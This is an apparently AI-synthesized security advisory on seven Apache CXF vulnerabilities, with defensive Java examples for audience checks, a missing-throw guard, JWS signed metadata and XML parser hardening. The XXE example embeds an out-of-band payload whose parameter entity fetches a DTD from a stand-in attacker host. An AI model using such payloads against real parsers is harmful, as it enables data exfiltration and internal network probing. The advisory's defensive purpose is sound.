VYPR
Advisory · Published Jun 12, 2026 · Updated Jun 14, 2026 · 1 source

Apache CXF: Seven CVEs Disclosed Together, Including Two RCE Flaws and an Auth Bypass


Key findings

  • Seven CVEs disclosed together for Apache CXF on June 12, 2026
  • Two high-severity RCE bugs: JNDI injection (CVE-2026-50633) and incomplete JMS fix (CVE-2026-50632)
  • Token confusion flaw (CVE-2026-50627) lets JWTs be replayed across resource servers
  • Authentication bypass in OAuth2 introspection endpoint (CVE-2026-50623) due to missing throw keyword
  • XXE vulnerability (CVE-2026-49875) via unhardened SAXParserFactory
  • All issues fixed in CXF 4.2.2 and 4.1.7; no workarounds available

On June 12, 2026, the Apache CXF project disclosed seven distinct vulnerabilities spanning denial of service, authentication bypass, token confusion, JNDI injection, and XML external entity (XXE) processing. The batch, fixed in releases 4.2.2 and 4.1.7, affects all earlier versions of the popular open-source services framework and includes two high-severity flaws rated CVSS 8.1 that could lead to remote code execution under specific conditions.

**JNDI injection and incomplete JMS fix (CVE-2026-50633, CVE-2026-50632)** The two most severe issues lie in Apache CXF's Java EE Connector Architecture (JCA) integration and its JMS configuration handling. CVE-2026-50633 (CVSS 8.1) is a JNDI injection in the JCA module: an attacker who can control the deployment descriptor (ra.xml) or the runtime activation parameters can inject an attacker-chosen JNDI name and achieve code execution. CVE-2026-50632 (CVSS 8.1) results from an incomplete fix for the previously disclosed CVE-2026-44417, which likewise involved untrusted JMS configuration leading to RCE. The precondition for both is control over configuration rather than over ordinary request data, so practical exposure is highest where deployment descriptors or connector settings are assembled from tenant or user input, or where a lower-privileged role is allowed to edit them. Together, the two CVEs show that CXF's integration points remain a high-risk attack surface whenever untrusted parties can supply configuration.

**Token confusion and authentication bypass (CVE-2026-50627, CVE-2026-50623)** Two flaws in CXF's OAuth2 and JWT handling weaken access control. CVE-2026-50627 is a missing audience (aud) claim check in the JwtAccessTokenValidator class, enabling token confusion (also called token routing) attacks: a JWT issued for one resource server is accepted when replayed against a different resource server that trusts the same issuer, because nothing ties the token to the server receiving it. CVE-2026-50623 (CVSS 6.5) is an authentication bypass in the OAuth2 TokenIntrospectionService caused by a missing throw keyword in the security context check: the exception object was constructed but never thrown, so the check had no effect and any unauthenticated network attacker could reach the introspection endpoint (/services/oauth2/introspect). The advisory characterizes this check as a safeguard rather than the primary authorization control, but its silent failure removed a defense layer that deployments may have been relying on.
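The two checks above, as an added example in Java that is not CXF's own code: a resource-server audience check that handles both the single-string and the array form of aud that RFC 7519 permits, and the introspection guard written once with the missing throw and once corrected. The class and exception names, the audience URL, and the already-parsed claim maps are assumptions for illustration; the JWT is assumed to have been signature-verified and parsed by a JOSE library before these checks run.

```java
import java.util.List;
import java.util.Map;

// Added example, not CXF's code. ResourceServerChecks, NotAuthorizedException and the
// sample claim maps are hypothetical; the token is assumed already signature-verified.
public final class ResourceServerChecks {

    /** Thrown when a request must be rejected. */
    public static final class NotAuthorizedException extends RuntimeException {
        public NotAuthorizedException(String msg) { super(msg); }
    }

    // The identifier this resource server expects to find in "aud" (assumed value).
    private final String myAudience;

    public ResourceServerChecks(String myAudience) { this.myAudience = myAudience; }

    /**
     * Token-confusion defence: a token is valid here only if its "aud" claim names this
     * resource server. RFC 7519 allows "aud" to be a single string or an array of strings.
     */
    public boolean audienceMatches(Map<String, Object> claims) {
        Object aud = claims.get("aud");
        if (aud instanceof String) {
            return myAudience.equals(aud);
        }
        if (aud instanceof List<?>) {
            for (Object a : (List<?>) aud) {
                if (myAudience.equals(a)) return true;
            }
            return false;
        }
        return false; // missing or malformed aud: reject, never default to accept
    }

    public void requireAudience(Map<String, Object> claims) {
        if (!audienceMatches(claims)) {
            throw new NotAuthorizedException("token not issued for " + myAudience);
        }
    }

    /**
     * The bug class behind CVE-2026-50623: constructing the exception without "throw"
     * compiles, builds the object, discards it, and the caller continues unauthenticated.
     */
    public static void requireAuthenticatedCallerBroken(String callerPrincipal) {
        if (callerPrincipal == null) {
            new NotAuthorizedException("anonymous access to introspection"); // no-op
        }
    }

    /** Corrected form: the check actually terminates the request. */
    public static void requireAuthenticatedCaller(String callerPrincipal) {
        if (callerPrincipal == null) {
            throw new NotAuthorizedException("anonymous access to introspection");
        }
    }

    public static void main(String[] args) {
        ResourceServerChecks rs = new ResourceServerChecks("https://api.example.com");
        // Constructed claims: one token minted for another resource server, one that lists ours.
        Map<String, Object> foreign = Map.of("sub", "alice", "aud", "https://other.example.com");
        Map<String, Object> ours = Map.of("sub", "alice",
                "aud", List.of("https://api.example.com", "https://other.example.com"));
        System.out.println("foreign token accepted: " + rs.audienceMatches(foreign));
        System.out.println("our token accepted: " + rs.audienceMatches(ours));

        requireAuthenticatedCallerBroken(null); // returns silently
        try {
            requireAuthenticatedCaller(null);
        } catch (NotAuthorizedException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The broken guard compiles without any javac warning because a class instance creation is a valid expression statement in Java; static analysis is the practical catch for it (Error Prone's DeadException check and SpotBugs' RV_EXCEPTION_NOT_THROWN pattern both flag an exception that is created but never thrown), which is worth enabling in CI for any code that gates access this way.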

**Unvalidated metadata processing (CVE-2026-50634)** Rated Medium (CVSS 6.5), CVE-2026-50634 affects the JwsJsonContainerRequestFilter, which handles the JWS JSON serialization. The filter let CXF act on metadata, such as a Content-Type or other header values, that was not covered by the JWS signature it had accepted. An application that assumes such metadata came from the verified signature entry can therefore be steered by attacker-supplied values even though the signature check itself passed.
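An added example, in Java and not CXF's own code, of the distinction this flaw turns on: in a JWS JSON serialization only the protected header enters the signing input, so metadata read from the unprotected header member or from a transport-level header such as Content-Type is not authenticated even when the signature verifies. The HMAC key, the payload, the header values and the toy JSON serializer for flat string maps are constructed for illustration; a real implementation uses a JOSE and JSON library.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;
import java.util.Map;
import java.util.TreeMap;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Added example, not CXF's code. Key, payload and header values are constructed.
public final class JwsProtectedMetadata {
    private static final Base64.Encoder ENC = Base64.getUrlEncoder().withoutPadding();
    private static final Base64.Decoder DEC = Base64.getUrlDecoder();

    /** One signature entry of a JWS JSON serialization (RFC 7515 section 7.2), kept as raw parts. */
    public static final class Entry {
        final String protectedB64;             // base64url(JSON): covered by the signature
        final Map<String, String> unprotected; // "header" member: NOT covered by the signature
        final String signatureB64;
        Entry(String p, Map<String, String> u, String s) { protectedB64 = p; unprotected = u; signatureB64 = s; }
    }

    // Toy JSON for flat string maps whose values contain no quotes or commas (illustration only).
    static String toJson(Map<String, String> m) {
        StringBuilder sb = new StringBuilder("{");
        boolean first = true;
        for (Map.Entry<String, String> kv : new TreeMap<>(m).entrySet()) {
            if (!first) sb.append(',');
            first = false;
            sb.append('"').append(kv.getKey()).append("\":\"").append(kv.getValue()).append('"');
        }
        return sb.append('}').toString();
    }

    static Map<String, String> fromJson(String json) {
        Map<String, String> out = new TreeMap<>();
        String body = json.substring(1, json.length() - 1);
        if (body.isEmpty()) return out;
        for (String pair : body.split(",")) {
            String[] kv = pair.split(":", 2);
            out.put(unquote(kv[0]), unquote(kv[1]));
        }
        return out;
    }

    static String unquote(String s) { return s.substring(1, s.length() - 1); }

    static byte[] hmacSha256(byte[] key, String signingInput) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        return mac.doFinal(signingInput.getBytes(StandardCharsets.US_ASCII));
    }

    public static Entry sign(byte[] key, Map<String, String> protectedHeader,
                             Map<String, String> unprotected, String payloadB64) throws Exception {
        String p = ENC.encodeToString(toJson(protectedHeader).getBytes(StandardCharsets.UTF_8));
        byte[] sig = hmacSha256(key, p + "." + payloadB64);
        return new Entry(p, new TreeMap<>(unprotected), ENC.encodeToString(sig));
    }

    /** Signing input is protected || '.' || payload; the unprotected header never enters it. */
    public static boolean verify(byte[] key, Entry e, String payloadB64) throws Exception {
        byte[] expected = hmacSha256(key, e.protectedB64 + "." + payloadB64);
        return MessageDigest.isEqual(expected, DEC.decode(e.signatureB64));
    }

    /** Metadata used for security decisions comes only from the header the signature covers. */
    public static String signedMetadata(Entry e, String name) {
        String json = new String(DEC.decode(e.protectedB64), StandardCharsets.UTF_8);
        return fromJson(json).get(name);
    }

    public static void main(String[] args) throws Exception {
        byte[] key = "constructed-demo-key-not-for-real-use".getBytes(StandardCharsets.UTF_8);
        String payload = ENC.encodeToString("{\"order\":\"42\"}".getBytes(StandardCharsets.UTF_8));
        Map<String, String> prot = new TreeMap<>(Map.of("alg", "HS256", "cty", "application/json"));
        Entry signed = sign(key, prot, new TreeMap<>(), payload);

        // A relaying attacker can freely rewrite the unprotected header...
        Entry relayed = new Entry(signed.protectedB64,
                new TreeMap<>(Map.of("cty", "application/x-evil")), signed.signatureB64);
        System.out.println("signature still verifies: " + verify(key, relayed, payload));
        // ...so cty must be read from the signed header, where the original value is intact.
        System.out.println("signed cty: " + signedMetadata(relayed, "cty"));
        System.out.println("unprotected cty (untrusted): " + relayed.unprotected.get("cty"));

        // Rewriting the protected header, by contrast, breaks the signature.
        Map<String, String> tampered = new TreeMap<>(prot);
        tampered.put("cty", "application/x-evil");
        String p2 = ENC.encodeToString(toJson(tampered).getBytes(StandardCharsets.UTF_8));
        Entry forged = new Entry(p2, new TreeMap<>(), signed.signatureB64);
        System.out.println("tampered protected header verifies: " + verify(key, forged, payload));
    }
}
```

The same rule applies to anything outside the JWS object entirely: an HTTP Content-Type header arrives with the request, not with the signature, so a filter that accepts a signature and then dispatches on the transport Content-Type is dispatching on unauthenticated input.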

**Denial of service via attachment headers (CVE-2026-50645)** CVE-2026-50645 (CVSS 7.5) stems from the absence of any limit on the number of attachment headers a message may carry during deserialization: a sender can make CXF allocate and process an unbounded number of headers, driving uncontrolled resource consumption and denial of service. The fix introduces a default maximum; the advisory publishes no configuration workaround for unpatched versions.

**XXE via missing SAXParser hardening (CVE-2026-49875)** The EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the JAXP hardening settings (disallowing DOCTYPE declarations, or at minimum disabling external general and parameter entities and external DTD loading), so a crafted document can make the parser resolve an external entity. Because the resolved content need not appear in any response, the flaw is exploitable out-of-band (OOB): the parser's own fetch of an attacker-controlled URL or internal address is the signal, which is enough to exfiltrate data or probe internal networks.
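The hardening the fix implies, as an added Java example that is not CXF's own code. It builds a SAXParserFactory with the standard JAXP anti-XXE features, parses a constructed document whose parameter entity points at a hypothetical attacker host, and shows that the hardened parser rejects it before any network fetch is attempted; the unhardened factory is included for comparison but is deliberately never given the payload, since it would attempt the fetch. The host name and the documents are constructed for the example.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

// Added example, not CXF's code. The payload and attacker host below are constructed.
public final class HardenedSaxParser {

    /** The unhardened construction the advisory describes: JAXP defaults resolve external entities. */
    public static SAXParserFactory unhardenedFactory() {
        return SAXParserFactory.newInstance();
    }

    /** The same factory with the standard JAXP anti-XXE settings applied. */
    public static SAXParserFactory hardenedFactory() throws ParserConfigurationException, SAXException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setNamespaceAware(true);
        f.setXIncludeAware(false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Rejecting any DOCTYPE is the strongest setting; the three that follow are the
        // fallback when a DTD must be tolerated but external resolution must not happen.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return f;
    }

    /** Returns true if the document parsed, false if the parser rejected it. */
    public static boolean parses(SAXParserFactory f, String xml)
            throws ParserConfigurationException, SAXException, IOException {
        SAXParser p = f.newSAXParser();
        try {
            p.parse(new InputSource(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8))),
                    new DefaultHandler());
            return true;
        } catch (SAXException e) {
            // With disallow-doctype-decl the DOCTYPE itself is the error, before any entity is fetched.
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed OOB-style payload: the parameter entity would make a default parser
        // fetch the attacker's DTD. The host is a reserved documentation name.
        String oob = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE d [<!ENTITY % remote SYSTEM \"http://attacker.example/evil.dtd\"> %remote;]>"
                + "<d/>";
        String benign = "<d><e>ok</e></d>";
        SAXParserFactory h = hardenedFactory();
        System.out.println("hardened parses benign document: " + parses(h, benign));
        System.out.println("hardened parses OOB payload: " + parses(h, oob));
        // unhardenedFactory() is intentionally not run on the payload: it would attempt the fetch.
    }
}
```

When auditing a codebase for this class of bug, every `SAXParserFactory.newInstance()`, `DocumentBuilderFactory.newInstance()`, `XMLInputFactory.newInstance()` and `SchemaFactory.newInstance(...)` call is a candidate; the question for each is whether the features above (or the equivalent `XMLInputFactory.SUPPORT_DTD` and `ACCESS_EXTERNAL_*` properties for the other factories) are set before a parser is created from it.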

**Response and remediation** All seven vulnerabilities are addressed in Apache CXF versions 4.2.2 and 4.1.7. Users running any earlier release, including all 4.0.x, 3.x, and older branches, should upgrade immediately. No per-CVE workarounds have been published; the Apache CXF team recommends the patched releases as the sole mitigation. Because CXF is frequently pulled in transitively (through Spring Boot starters or an application server bundle) rather than declared directly, confirm the resolved version in the build tool's dependency report rather than relying on the declared one. Given the two RCE-class bugs (CVE-2026-50633, CVE-2026-50632) and the authentication bypass (CVE-2026-50623), organizations using CXF in internet-facing or multi-tenant deployments should prioritize the update.

Synthesized by Vypr AI